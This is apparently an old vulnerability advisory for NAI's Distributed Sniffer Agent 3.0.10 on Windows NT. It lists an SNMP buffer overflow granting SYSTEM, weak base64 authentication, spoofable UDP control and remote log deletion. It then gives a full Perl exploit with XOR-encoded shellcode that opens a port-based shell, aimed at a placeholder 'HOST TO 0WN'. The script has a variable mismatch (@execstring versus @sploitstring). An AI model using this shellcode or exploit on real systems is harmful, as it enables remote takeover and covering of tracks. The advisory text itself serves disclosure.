|
Vulnerability Distributed Sniffer Agent Affected NAI's Distributed Sniffer Agent Description Kevin Start found following. This 'advisory' details a number of problems with NAI's sniffer product. They have fixed the problems in current versions on the sly so we have foregone notifying the vendor. They saw fit to post an advisory on Microsoft's Netmon today so 'all is fair in love and war' at least MS had the dignity to announce their fixes. NAI's Distributed Sniffer Agent can be overflowed remotely to grant SYSTEM privilege. Additional vulnerabilities exist in the management protocol to allow an attacker to recover logins passwords, take control of the agent, and delete logs. This has been tested with Agent version 3.0.10 using Windows NT Workstation 4.0 SP6. 1. The most severe problem was an overflow during SNMP writes. NAI elected to use a single community for both public and private access simplifying the process of brute forcing the community string. Once this string has been guessed, shellcode can be written into any accessible object (sysName, for example). The buffer is 256 bytes long with no character restrictions as nulls are allowed when using hex mode as the SNMP encoding. This attack can be launched completely blind with one spoofed UDP packet. SYSTEM privilege can be gained using this method. 2. Authentication was handled using base64 encoded logins and passwords. Dsniff by Dugsong already includes a module for capturing logins and passwords from the agent. Base64 encoding was also used to obfuscate changes to the agent's user database. 3. All remote access to the agent is handled using UDP. Once a user has authenticated to the agent, an attacker can inject his own spoofed commands. Full control of the agent can be gained in this manner. If the packet generation facility was enabled, a packet flood could be initiated. 4. All data transferred from the agent is in cleartext, allowing an attacker to recover data being sniffed on a remote network segment. 5. Flooding the agent with false login requests can cause system instability. A kernel fault was caused during testing. 6. Logs can be deleted remotely, allowing an attacker to delete his own brute forcing attempts once he is successful. Exploit: #!/usr/bin/perl # exploit for NAI Sniffer Agent 3.0.10 # Silently patched in later versions, although customers # were not notified. No workaround was ever released. $xoredport="88 88 "; # (4369) port XORed with 0x99 $egg =" eb 07 90 aa 1c 9c 77 90 90 90 33 c0 50 f7 d0 50 59 f2 af 59 b1 c6 8b c7 48 80 30 99 e2 fa 60 8d 85 70 fe ff ff 50 68 01 01 00 00 bb 77 be 6b 77 ff d3 61 90 90 90 90 33 f6 96 bb 99 3c 60 47 c1 eb 08 56 ff 13 8b d0 fc 33 c9 b1 0b 49 32 c0 ac 84 c0 75 f9 52 51 56 52 b3 40 ff 13 ab 59 5a e2 ec 32 c0 ac 84 c0 75 f9 b3 3c 56 ff 13 8b d0 fc 33 c9 b1 06 32 c0 ac 84 c0 75 f9 52 51 56 52 b3 40 ff 13 ab 59 5a e2 ec 83 c6 05 33 c0 50 40 50 40 50 ff 57 e8 93 6a 10 56 53 ff 57 ec 6a 02 53 ff 57 f0 33 c0 57 50 b0 0c ab 58 ab 40 ab 5f 48 50 57 56 ad 56 ff 57 c0 48 50 57 ad 56 ad 56 ff 57 c0 48 b0 44 89 07 57 ff 57 c4 33 c0 8b 46 f4 89 47 3c 89 47 40 8b 06 89 47 38 33 c0 66 b8 01 01 89 47 2c 57 57 33 c0 50 50 50 40 50 48 50 50 ad 56 33 c0 50 ff 57 c8 ff 76 f0 ff 57 cc ff 76 fc ff 57 cc 48 50 50 53 ff 57 f4 8b d8 33 c0 b4 04 50 c1 e8 04 50 ff 57 d4 8b f0 33 c0 8b c8 b5 04 50 50 57 51 50 ff 77 a8 ff 57 d0 83 3f 01 7c 22 33 c0 50 57 ff 37 56 ff 77 a8 ff 57 dc 0b c0 74 2f 33 c0 50 ff 37 56 53 ff 57 f8 6a 50 ff 57 e0 eb c8 33 c0 50 b4 04 50 56 53 ff 57 fc 57 33 c9 51 50 56 ff 77 ac ff 57 d8 6a 50 ff 57 e0 eb aa 50 ff 57 e4 90 d2 dc cb d7 dc d5 aa ab 99 da eb fc f8 ed fc c9 f0 e9 fc 99 de fc ed ca ed f8 eb ed ec e9 d0 f7 ff f6 d8 99 da eb fc f8 ed fc c9 eb f6 fa fc ea ea d8 99 da f5 f6 ea fc d1 f8 f7 fd f5 fc 99 c9 fc fc f2 d7 f8 f4 fc fd c9 f0 e9 fc 99 de f5 f6 fb f8 f5 d8 f5 f5 f6 fa 99 ce eb f0 ed fc df f0 f5 fc 99 cb fc f8 fd df f0 f5 fc 99 ca f5 fc fc e9 99 dc e1 f0 ed c9 eb f6 fa fc ea ea 99 ce ca d6 da d2 aa ab 99 ea f6 fa f2 fc ed 99 fb f0 f7 fd 99 f5 f0 ea ed fc f7 99 f8 fa fa fc e9 ed 99 ea fc f7 fd 99 eb fc fa ef 99 9b 99 $xoredport 99 99 99 99 99 99 99 99 99 99 99 99 fa f4 fd b7 fc e1 fc 99 ff ff ff ff "; $offset = "00 c7 12 00 "; $snmpset = "/usr/bin/snmpset"; $community = "public"; $objid = "system.sysName.0"; $offcount = 80; $nopcount = 200; @execstring = ("\" ", $offset x $offcount, "90 "x $nopcount, $egg," \""); $host="HOST TO 0WN"; exec ("$snmpset $host $community $objid x @sploitstring"); Solution Fixed in current versions.